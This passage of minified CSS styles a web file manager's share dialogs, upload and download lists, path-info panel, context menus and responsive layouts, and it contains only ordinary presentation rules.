.share-dialog .content-box .content-info{padding:30px 20px 30px 20px;}.support-space-not .system-content .right-frame .group-title .group-size{display:none !important;}.support-space-not .size-max-set,.support-space-not .user-setting-more-btn,.support-space-not .user-setting-more{display:none;}.support-space-not .user-list .space,.support-space-not .share-view-info,.support-space-not .user-space-info{display:none;}.support-space-not .frame-main .user-space-info{display:none;}.support-space-not .frame-main .frame-left .group-space-use{display:none;}.support-space-not .frame-main .frame-left #folder-list-tree{bottom:70px;}.dropdown-menu.menu-topbar-user{right:6px;}.version-vip{height:26px;line-height:26px;padding:0;opacity:0.7;filter:alpha(opacity=70);padding-left:25px;cursor:pointer;font-size:12px;display:block;color:#eee;background:#999;}.version-vip#version_vip_1{color:#bdeaff;background:#03a9f4;}.version-vip#version_vip_2{color:#ea9df7;background:#9c27b0;}.version-vip#version_vip_3,.version-vip#version_vip_4,.version-vip#version_vip_5,.version-vip#version_vip_6{color:#fff;background:#ffc107;}.version-vip:hover{opacity:0.9;filter:alpha(opacity=90);text-decoration:none;}.version-license{width:250px;height:250px;overflow:hidden;position:absolute;z-index:9999;pointer-events:none;top:30px;left:0px;}.version-license a.line{position:absolute;pointer-events:all;width:300px;height:60px;line-height:60px;left:-70px;top:40px;font-size:20px;background:#4CAF50;text-decoration:none;-webkit-transform:rotate(-45deg);-moz-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transition:all 0.2;-moz-transition:all 0.2;-o-transition:all 0.2;-ms-transition:all 0.2;transition:all 0.2;text-align:center;color:#fff;opacity:0.9;filter:alpha(opacity=90);}.version-license a.line:hover{opacity:0.7;filter:alpha(opacity=70);}.path-select-input{width:550px;padding:7px;background:rgba(255,255,255,0.3);border:1px solid rgba(100,100,100,0.3);color:#000;}.aui-state-lock .aui-min{display:none;}.dialog-copyright{width:400px !important;}.dialog-copyright,.share-dialog,.check-version-dialog{min-width:400px;}.dialog-copyright.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer{overflow:inherit;box-shadow:0 0px 60px rgba(0,0,0,0.4);border-radius:5px;border:none;}.dialog-copyright.dialog-simple .aui-outer,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in,.share-dialog.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in,.check-version-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-main,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.share-dialog.dialog-simple .aui-outer .aui-main,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.check-version-dialog.dialog-simple .aui-outer .aui-main,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-header,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.share-dialog.dialog-simple .aui-outer .aui-header,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.check-version-dialog.dialog-simple .aui-outer .aui-header,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header{border:none;}.dialog-copyright.dialog-simple .aui-header,.share-dialog.dialog-simple .aui-header,.check-version-dialog.dialog-simple .aui-header{background:transparent;opacity:1.0;filter:alpha(opacity=100);border:none;}.dialog-copyright.dialog-simple .aui-nw,.dialog-copyright.dialog-simple .aui-n,.dialog-copyright.dialog-simple .aui-ne,.dialog-copyright.dialog-simple .aui-w,.dialog-copyright.dialog-simple .aui-e,.dialog-copyright.dialog-simple .aui-sw,.dialog-copyright.dialog-simple .aui-s,.dialog-copyright.dialog-simple .aui-se,.share-dialog.dialog-simple .aui-nw,.share-dialog.dialog-simple .aui-n,.share-dialog.dialog-simple .aui-ne,.share-dialog.dialog-simple .aui-w,.share-dialog.dialog-simple .aui-e,.share-dialog.dialog-simple .aui-sw,.share-dialog.dialog-simple .aui-s,.share-dialog.dialog-simple .aui-se,.check-version-dialog.dialog-simple .aui-nw,.check-version-dialog.dialog-simple .aui-n,.check-version-dialog.dialog-simple .aui-ne,.check-version-dialog.dialog-simple .aui-w,.check-version-dialog.dialog-simple .aui-e,.check-version-dialog.dialog-simple .aui-sw,.check-version-dialog.dialog-simple .aui-s,.check-version-dialog.dialog-simple .aui-se{height:0px;width:0px;background:none;}.dialog-copyright.dialog-simple .aui-inner,.share-dialog.dialog-simple .aui-inner,.check-version-dialog.dialog-simple .aui-inner{border:none;background:none;}.dialog-copyright.dialog-simple .aui-title,.share-dialog.dialog-simple .aui-title,.check-version-dialog.dialog-simple .aui-title{opacity:0.01;filter:alpha(opacity=1);top:0px;position:absolute;width:100%;height:100%;z-index:5;}.dialog-copyright.dialog-simple .aui-min,.dialog-copyright.dialog-simple .aui-max,.share-dialog.dialog-simple .aui-min,.share-dialog.dialog-simple .aui-max,.check-version-dialog.dialog-simple .aui-min,.check-version-dialog.dialog-simple .aui-max{display:none;}.dialog-copyright.dialog-simple .aui-title-bar,.share-dialog.dialog-simple .aui-title-bar,.check-version-dialog.dialog-simple .aui-title-bar{bottom:0px;overflow:hidden;height:100px;position:absolute;margin-top:-120px;top:120px;margin-left:0px;border-radius:4px;}.dialog-copyright.dialog-simple .aui-close,.share-dialog.dialog-simple .aui-close,.check-version-dialog.dialog-simple .aui-close{opacity:0.6;filter:alpha(opacity=60);background:rgba(0,0,0,0.5);width:100px;height:100px;top:-50px;right:-50px;border-radius:50px;text-align:left;font-size:20px;z-index:100;padding:0;}.dialog-copyright.dialog-simple .aui-close:hover,.share-dialog.dialog-simple .aui-close:hover,.check-version-dialog.dialog-simple .aui-close:hover{opacity:0.6;filter:alpha(opacity=60);}.dialog-copyright.dialog-simple .aui-close:active,.share-dialog.dialog-simple .aui-close:active,.check-version-dialog.dialog-simple .aui-close:active{opacity:1.0;filter:alpha(opacity=100);}.dialog-copyright.dialog-simple .aui-close::before,.share-dialog.dialog-simple .aui-close::before,.check-version-dialog.dialog-simple .aui-close::before{padding-left:22px;line-height:140px;}.dialog-copyright .aui-footer,.share-dialog .aui-footer,.check-version-dialog .aui-footer{display:none;}.check-version-dialog .update-box{margin-top:0px;}.share-dialog .content-box .content-info .input-line .open-window,.pathinfo .input-group-btn .open-window{margin-right:-1px;border-radius:0px;}.dialog-copyright .dialog-copyright-content,.check-version-dialog .aui-content{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;width:auto;border-radius:6px;width:400px;-webkit-box-shadow:0px 10px 60px rgba(0,0,0,0.4);-moz-box-shadow:0px 10px 60px rgba(0,0,0,0.4);box-shadow:0px 10px 60px rgba(0,0,0,0.4);border:1px solid #ccc \9;padding-bottom:30px;background:#fff;background:rgba(255,255,255,0.9);}.dialog-copyright .dialog-copyright-content .title,.check-version-dialog .aui-content .title{width:100%;background:#6699cc url("../../../images/common/login.png");height:150px;padding-top:0px;border-top-left-radius:5px;border-top-right-radius:5px;}.dialog-copyright .dialog-copyright-content .title .logo,.check-version-dialog .aui-content .title .logo{text-align:center;font-size:35px;width:100%;padding-top:40px;color:#aaddff;-webkit-box-reflect:below -13px -webkit-gradient(linear,left top,left bottom,from(transparent),to(rgba(255,255,255,0.2)));background-image:-webkit-linear-gradient(92deg,#FFFFFF,#14A1FF);-webkit-background-clip:text;-webkit-text-fill-color:transparent;-webkit-animation:hue 6s 100 linear;}.dialog-copyright .dialog-copyright-content .title .logo i,.check-version-dialog .aui-content .title .logo i{color:#aaddff;font-weight:400;margin-right:10px;}.dialog-copyright .dialog-copyright-content .title .info,.check-version-dialog .aui-content .title .info{text-align:right;font-size:1.15em;color:#aaddff;padding-right:14px;padding-top:30px;}.dialog-copyright .dialog-copyright-content .content,.check-version-dialog .aui-content .content{padding:20px;}.dialog-copyright .dialog-copyright-content .content p,.check-version-dialog .aui-content .content p{text-indent:2em;color:#333;margin-bottom:30px;}.dialog-copyright .dialog-copyright-content .content a,.check-version-dialog .aui-content .content a{padding-right:5px;}.dialog-copyright .dialog-copyright-content .content div,.check-version-dialog .aui-content .content div{text-align:center;padding-bottom:5px;}.check-version-dialog.dialog-simple .aui-title-bar{margin-top:-120px;}.share-dialog .content-box{-webkit-box-shadow:0 5px 30px rgba(0,0,0,0.5);-moz-box-shadow:0 5px 30px rgba(0,0,0,0.5);box-shadow:0 5px 30px rgba(0,0,0,0.5);border-radius:5px;background:#fff;border:1px solid #ccc \9;width:auto;}.share-dialog .content-box .title{width:100%;color:#fff;height:100px;border-radius:5px 5px 0 0;background:#6699cc url('../../../images/common/login.png');}.share-dialog .content-box .titleinfo{text-align:center;font-size:35px;height:60px;overflow:hidden;line-height:80px;}.share-dialog .content-box .titleinfo i{color:#dff;font-size:30px;padding-right:10px;}.share-dialog .content-box .share-view-info{width:200px;margin:0 auto;margin-top:0px;padding:1px 5px;text-align:center;border-radius:17px;background:#117eaf;background:rgba(0,0,0,0.2);opacity:0.8;filter:alpha(opacity=80);}.share-dialog .content-box .content-info{padding:10px;padding-left:20px;}.share-dialog .content-box .content-info .input-line{margin:6px 0 8px 0;position:relative;}.share-dialog .content-box .content-info .input-line .input-title{display:block;width:80px;padding-top:4px;float:left;height:30px;padding-right:10px;text-align:right;}.share-dialog .content-box .content-info .input-line input[type="text"]{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:32px;line-height:30px;padding:0px 5px;width:150px;margin-right:10px;float:left;border-radius:3px;}.share-dialog .content-box .content-info .input-line input[type="text"]:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.share-dialog .content-box .content-info .input-line label{margin-top:8px;margin-right:10px;}.share-dialog .content-box .content-info .input-line label input{margin:0 5px 5px 0;}.share-dialog .content-box .content-info .input-line .desc{font-size:1em;color:#bbb;font-style:normal;padding-left:0px;}.share-dialog .content-box .content-info .input-line .share-name{width:215px;margin-right:10px;}.share-dialog .content-box .content-info .input-line .share-url{margin-right:0;border-radius:3px 0 0 3px;width:167px !important;height:33px;}.share-dialog .content-box .content-info .input-line .share-more{line-height:33px;}.share-dialog .content-box .content-info .input-line .input-group-btn{float:left;}.share-dialog .content-box .content-info .input-line .dropdown-toggle{margin-left:-5px;border-radius:0 3px 3px 0;}.share-dialog .content-box .content-info .input-line .open-window{margin-left:-12px;}.share-dialog .content-box .content-info .input-line .share-copy{width:60px;border-radius:0px;margin-left:-7px;}.share-dialog .content-box .content-info .input-line.select-path input[type="text"]{width:155px;}.share-dialog .content-box .content-info .input-line.select-path a.select-btn{margin-left:-14px;padding:5px 8px 5px;font-size:15px;border-top-left-radius:0px;border-bottom-left-radius:0px;}.share-dialog .content-box .content-info .share-others{margin:-8px 0 -8px 0;}.share-dialog .content-box .share-action{border-top:1px solid #eee;background:#f8f8f8;height:60px;border-radius:0 0 4px 4px;}.share-dialog .content-box .share-action button{float:right;margin:10px 20px 10px 0px;outline:0;}.share-dialog .content-box .share-action .share-remove-button,.share-dialog .content-box .share-action .remove-button{float:right;margin-top:18px;color:#888;margin-right:20px;font-size:14px;}.share-dialog .content-box .share-action .share-remove-button:hover,.share-dialog .content-box .share-action .remove-button:hover{color:#f30;}.file-list-icon .file{position:relative;}.file-list-icon .file .download{position:absolute;bottom:4px;margin-left:45px;opacity:0.5;filter:alpha(opacity=50);}.file-list-icon .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:30px;line-height:30px;width:30px;color:#aaa;}.file-list-list .file{position:relative;}.file-list-list .file .download{position:absolute;bottom:-2px;margin-left:45px;left:180px;z-index:99;opacity:0.5;filter:alpha(opacity=50);}.file-list-list .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:28px;line-height:28px;width:28px;color:#aaa;}.pathSelectApi .aui-footer .aui-buttons{padding:15px;}.pathSelectApi .aui-footer .label{position:absolute;right:175px;margin-top:6px;opacity:0.7;filter:alpha(opacity=70);}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{opacity:0.7;filter:alpha(opacity=70);color:#08c !important;}body div.file-continer .file.file-not-readable,body div.file-continer .file.file-not-readable.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-readable,body .frame-main .frame-left .ztree li a.file-not-readable.file-not-writeable{opacity:0.4;filter:alpha(opacity=40);color:#a00 !important;}.url-link input{border:1px solid #ddd;background:#fff;line-height:30px;height:30px;width:300px;margin-bottom:15px;padding:0 5px;}.aui-content .ajaxError{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;color:#f60;position:absolute;left:0px;right:0px;bottom:0px;top:40px;overflow:auto;padding:10px;}.pathinfo{font-size:1em;width:350px;min-height:300px;padding:20px 0 10px 0;color:#446;}.pathinfo .line{width:95%;margin:8px auto 8px auto;height:0px;border-bottom:1px solid #eee;}.pathinfo .download-url{padding:0px 5px;width:140px;line-height:32px;height:32px;}.pathinfo .p{margin-bottom:2px;}.pathinfo .p .icon{width:40px;height:40px;float:left;border:1px solid #f6f6f6;margin-left:10px;}.pathinfo .p input.info-chmod{padding:0px 10px;width:55px;color:#999;margin-right:10px;display:inline-block;height:25px;line-height:25px;}.pathinfo .p .title{width:80px;float:left;color:#888;text-align:right;}.pathinfo .p .content{float:left;width:240px;word-break:break-all;color:#666;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;font-size:1em;margin-left:15px;}.pathinfo .p .content.file-md5-loading{background:url("../../../images/common/loading.gif") 18px 5px no-repeat;}.pathinfo input{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;line-height:28px;padding:2px 5px;width:150px;float:left;height:28px;border-radius:3px;}.pathinfo input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.pathinfo .download-url{margin-right:0;border-radius:3px 0 0 3px;}.file-drag-upload .aui-content{overflow-y:scroll;}.fileupload{padding-left:25px;}.fileupload span.status{padding-left:10px;font-size:10px;color:#f96;}.movie-player-dialog{overflow:hidden;}.flash-player{width:100%;height:100%;}.wmp-player{width:0%;height:0%;}.movie-player-dialog .aui-content{background:#000;}.dialog-path-remove .aui-content{word-wrap:break-word;width:auto;}.server-dwonload-textarea textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.server-dwonload-textarea textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.file-upload-box{height:385px;padding:5px;min-width:365px;overflow:hidden;}.file-upload-box .topbar-nav{border-bottom:1px solid #ddd;margin-top:6px;}.file-upload-box .menu{display:block;text-decoration:none;float:left;padding:0px 15px;height:26px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fff,#eee);background-image:-moz-linear-gradient(top,#fff,#eee);background-image:-o-linear-gradient(top,#fff,#eee);background-image:-ms-linear-gradient(top,#fff,#eee);background-image:linear-gradient(top,#fff,#eee);-pie-background:linear-gradient(to top,#fff,#eee);font-size:1em;border:1px solid #ccc;text-align:center;line-height:24px;margin-right:5px;margin-bottom:-1px;color:#444;border-radius:4px 4px 0 0;}.file-upload-box .menu.this{background:#fff;border-bottom:1px solid #fff;}.file-upload-box .menu:hover{background:#fff;}.file-upload-box .upload-box{margin-top:10px;}.file-upload-box .download-btn-group{margin-left:-10px;margin-top:-2px;margin-top:-4px \9;}.file-upload-box .download-btn-group .download-start{border-radius:0px;}.file-upload-box .upload-box-tips .btn.btn-default{border-radius:3px;color:#555;}.file-upload-box .upload-box-tips .btn-group>.btn:last-child:not(:first-child),.file-upload-box .upload-box-tips .btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0;}.file-upload-box div a.left{margin-left:10px;}.file-upload-box div a.right{position:absolute;right:5px;}.file-upload-box span.info{font-size:1em;font-style:italic;padding:0px 0 5px 10px;}.file-upload-box i{font-size:1em;color:#aaa;padding-left:10px;}.file-upload-box .list{margin:10px 15px 10px 0;}.file-upload-box .list input{margin-left:10px;width:190px;height:22px;line-height:24px;padding:0px 3px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.file-upload-box .list input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.file-upload-box .submit input{float:right;padding:4px 20px;background:#ddd;border:none;margin-right:36px;margin-top:10px;}.file-upload-box .submit input:hover{background:#bbb;}.file-upload-box .submit input:active{background:#444;color:#fff;}.file-upload-box .uploader-content{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;background:url("../../../images/common/drop_upload.png") no-repeat center;}.file-upload-box #downloader{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;}.file-upload-box .webuploader-container{position:relative;}.file-upload-box .webuploader-element-invisible{position:absolute !important;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);}.file-upload-box .webuploader-pick{position:relative;display:inline-block;color:#fff;text-align:center;height:27px;line-height:27px;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);cursor:pointer;padding:0px 15px;}.file-upload-box .webuploader-pick-hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .upload-cert{width:24px;background:#def;height:100%;float:left;cursor:pointer;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);height:27px;line-height:27px;position:relative;z-index:10;padding:0;border:none;margin-left:-5px;border-left:1px solid rgba(0,0,0,0.1);border-top-right-radius:3px;border-bottom-right-radius:3px;}.file-upload-box .upload-cert .caret{margin-top:-2px;margin-left:-1px;border-top:4px solid #fff;}.file-upload-box .upload-cert-box .dropdown-menu{right:inherit;top:inherit;margin-top:30px;}.file-upload-box .upload-cert-box .dropdown-menu:before{right:inherit;left:10px;}.file-upload-box .upload-cert-box .dropdown-menu:after{right:inherit;left:11px;}.file-upload-box .upload-cert-box.open.upload-cert,.file-upload-box .upload-cert-box .upload-cert:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .webuploader-pick-disable{opacity:0.6;filter:alpha(opacity=60);pointer-events:none;}.file-upload-box .btns{margin-bottom:10px;font-size:1em;height:28px;}.file-upload-box .btns .tips{float:right;line-height:30px;}.file-upload-box .btns #picker{float:left;}.file-upload-box .upload-box-tips{line-height:34px;color:#888;position:absolute;right:10px;}.file-upload-box .upload-box-config{box-shadow:inset 0px 1px 6px rgba(0,0,0,0.3);border-radius:2px;margin-bottom:10px;padding:4px;}.file-upload-box .upload-box-config .upload-check-box{margin-left:10px;}.file-upload-box .upload-box-config label{margin-left:15px;}.file-upload-box .upload-box-config label input{margin-right:5px;}.file-upload-box .uploader-list .item,.file-upload-box .download-list .item{padding:0px;height:35px;overflow:hidden;position:relative;border-bottom:1px solid #ccc;background:#fefefe;}.file-upload-box .uploader-list .item .info,.file-upload-box .download-list .item .info{color:#224;line-height:35px;padding:0 5px;z-index:100;position:relative;font-size:1em;}.file-upload-box .uploader-list .item .info span,.file-upload-box .uploader-list .item .info a,.file-upload-box .download-list .item .info span,.file-upload-box .download-list .item .info a{float:left;height:30px;display:block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}.file-upload-box .uploader-list .item .info .title,.file-upload-box .download-list .item .info .title{color:#3A87AD;width:160px;width:50%;font-weight:800;}.file-upload-box .uploader-list .item .info .size,.file-upload-box .download-list .item .info .size{width:45px;text-align:center;color:#3A87AD;font-size:12px;}.file-upload-box .uploader-list .item .info .state,.file-upload-box .download-list .item .info .state{width:100px;width:27%;text-align:right;font-size:12px;}.file-upload-box .uploader-list .item .info .font-icon,.file-upload-box .download-list .item .info .font-icon{margin-left:12px;font-size:20px;width:20px;line-height:35px;cursor:pointer;color:#bbb;}.file-upload-box .uploader-list .item .info .font-icon:hover,.file-upload-box .download-list .item .info .font-icon:hover{text-decoration:none;color:#f60;}.file-upload-box .uploader-list .item .info .icon-ok,.file-upload-box .download-list .item .info .icon-ok{color:#40AA53;}.file-upload-box .uploader-list .item .info .error,.file-upload-box .download-list .item .info .error{color:#f30;}.file-upload-box .uploader-list .item.success,.file-upload-box .download-list .item.success{background:#eaf8ff;}.file-upload-box .uploader-list .item.error,.file-upload-box .download-list .item.error{background:#ffe8e6;}.file-upload-box .uploader-list .item .progress,.file-upload-box .download-list .item .progress{height:38px;margin:0px;width:100%;border-radius:0;box-shadow:none;position:absolute;top:0;}.file-upload-box .uploader-list .item .progress-bar,.file-upload-box .download-list .item .progress-bar{background-color:#adf;background-image:linear-gradient(45deg,rgba(255,255,255,0.35) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.35) 50%,rgba(255,255,255,0.35) 75%,transparent 75%,transparent);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ddeeff',endColorstr='#88ccff',GradientType=1);BACKGROUND-REPEAT:repeat-x;}.file-upload-box .uploader-list .success:hover,.file-upload-box .download-list .success:hover{cursor:pointer;background:#def;border-bottom:1px solid #3A87AD;}@media screen and (-ms-high-contrast:active),(-ms-high-contrast:none){.btn{ padding:5px 14px;} input[type='checkbox'].kui-checkbox-ios.size-big + em{ height:27px;} #body .system-content .right-frame .user-list table tr td.select input{ position:relative;top:4px;} #body table tr input[type='text']{ line-height:22px;} .do-search-box .search-header .btn-right{ margin:-9px 0 0 -2px;height:23px;} .appbox .appline.icon .open{ margin-top:-2px;} .appbox .appline label{ position:relative;top:-4px;} #body .main .group-editor .tag input{ position:relative;top:-5px;} .share-dialog .aui-border{ overflow:auto;} .share-dialog .content-box .content-info .input-line.select-path a.select-btn{ padding:3px 8px 4px;} .kui-radio + span, .kui-checkbox + span{ position:relative;top:-6px;} .kui-radio.size-small + span, .kui-checkbox.size-small + span{ position:relative;top:-4px;} .kui-radio.size-smallx + span, .kui-checkbox.size-smallx + span{ position:relative;top:-2px;}}@media (max-width:743px){html #body .app-menu-left, html body .app-menu-left{ width:50px;min-width:50px;} html #body .app-menu-left .search{ opacity:0.001;} html #body .menu-left .setting a.selected, html body .menu-left .setting a.selected{ padding-left:0px;margin-left:-5px;} html #body .main.app-content, html body .main.app-content{ left:50px;} html #body .main.app-content .app-list, html body .main.app-content .app-list{ justify-content:space-around;} html .form-box .form-row .setting-title{ text-align:left;} html .form-box .form-row.form-userSelect .setting-content{ padding:10px 5%;} html .form-box .form-row .setting-content{ width:90%;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{ width:100%;height:40px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{ left:0px;top:80px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{ float:left;} html #body.plugin-page .app-menu-left .line, html body.plugin-page .app-menu-left .line{ padding:4px 0;} html body #body .menu-left, html body #body .app-menu-left{ width:50px;min-width:50px;} html body #body .menu-left h1, html body #body .app-menu-left h1{ font-size:14px;font-weight:800 !important;padding:10px 0px 10px 0px;text-align:center;} html body #body .menu-left .font-icon, html body #body .app-menu-left .font-icon{ padding-right:30px;} html #body .setting-tools-right, html body .setting-tools-right{ top:0;} html #body .main .nav a, html body .main .nav a{ padding:5px 10px;} html #body .main .nav, html body .main .nav{ margin-right:0px;} html #body .setting-tab, html body .setting-tab, html #body .system-content, html body .system-content{ margin-right:10px;} html #body .main, html body .main{ left:50px;width:auto;margin-right:10px;} html .form-box .form-row .desc, html .form-box .form-row .setting-content i{ display:block;} html #body .setting-tab .form-row, html body .setting-tab .form-row, html #body .system-content .form-row, html body .system-content .form-row{ background:#fafafa;border-radius:4px;padding:0 5px;} html .form-box .form-row .setting-title{ height:20px;line-height:20px;} html .form-box .form-row{ padding:0;} html .form-box .form-row input[type='text'], html .form-box .form-row input[type='password'], html .form-box .form-row input[type='number']{ width:180px;} html .form-box .form-row #wallpage-url{ width:150px !important;} html #body .main .section .content .box p, html body .main .section .content .box p{ text-indent:10px;} html #body .system-content.setting-member{ width:800px;} html body.setting-page .select-user-group .right-content, html body.setting-page .select-user-group .left-content{ width:170px;} html .topbar .content .top-right ul.dropdown-menu.topbar-language{ width:235px;max-height:800px;} html #body .main .section .box, html body .main .section .box{ margin-right:10px;} html #body .main .section .box .list, html body .main .section .box .list{ width:95px;height:95px;} html #body .main .section .box .list .ico, html body .main .section .box .list .ico{ width:75px;height:60px;} html #body .panel, html body .panel{ margin-right:0px;} html #body .main.app-content .app-list .app-li, html body .main.app-content .app-list .app-li{ margin:0 5px 20px 0;width:130px;} html #body .main.app-content .app-model, html body .main.app-content .app-model{ padding:10px;}}@-webkit-keyframes fadein{0%{ opacity:0;} 50%{ opacity:0.4;}}.playmusic-icon{display:none;}.context-menu-list{margin:0;margin-left:4px;min-width:190px;max-width:300px;font-size:1em;display:inline-block;position:absolute;list-style-type:none;padding:8px 0px;border:none;border:1px solid #ccc \9;border-radius:4px;background:#fff;-webkit-box-shadow:0 10px 80px rgba(0,0,0,0.4);-moz-box-shadow:0 10px 80px rgba(0,0,0,0.4);box-shadow:0 10px 80px rgba(0,0,0,0.4);}.context-menu-list span b{display:inline-block;font-size:1em;font-weight:200;color:#aaa;padding-left:10px;min-width:50px;text-align:right;overflow:hidden;position:absolute;right:10px;width:65px;}.context-menu-list .hover>span>b{color:#fff;}.context-menu-list.menu-auto-fit{top:5px !important;}.context-menu-list li.selected{border-left:none !important;background:none;}.context-menu-list li.selected i.font-icon{color:#aaa;font-family:FontAwesome;font-weight:normal;font-style:normal;}.context-menu-list li.selected i.font-icon:before{content:"\f00c" !important;}.context-menu-list .context-menu-submenu:after{content:"\f0da";font-family:FontAwesome;display:inline-block;float:right;margin-right:0px;right:10px;position:absolute;}.context-menu-list .context-menu-item{display:block;cursor:pointer;white-space:nowrap;clear:both;line-height:25px;height:23px;position:relative;border:none;padding:0px 20px 0 15px;color:#222;-webkit-transition:background-color .1s;-moz-transition:background-color .1s;-o-transition:background-color .1s;-ms-transition:background-color .1s;transition:background-color .1s;}.context-menu-list .context-menu-item .font-icon{display:inline-block;width:16px;text-align:center;font-size:1.2em;color:#aaa;margin-right:15px;vertical-align:middle;margin-top:-2px;padding:0;}.context-menu-list .context-menu-item.disabled,.context-menu-list .context-menu-item.disable{cursor:not-allowed;pointer-events:auto;color:#ccc;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{color:#ddd;}.context-menu-list .context-menu-item.disabled.hover,.context-menu-list .context-menu-item.disable.hover{color:#ccc;cursor:default;background-color:#fff;}.context-menu-list .context-menu-item.disabled.hover .font-icon,.context-menu-list .context-menu-item.disable.hover .font-icon{color:#ddd;}.context-menu-list .context-menu-item.hover{cursor:pointer;color:#fff;background:#63acff;background-color:none \9;}.context-menu-list .context-menu-item.hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item span i{float:right;text-align:right;font-style:normal;color:#888;}.context-menu-list .context-menu-item.context-menu-separator{height:2px;line-height:0;border-bottom:1px solid #eee;margin:2px 0 4px;}.context-menu-list .context-menu-item > .context-menu-list{display:none;right:-5px;top:5px;}.context-menu-list 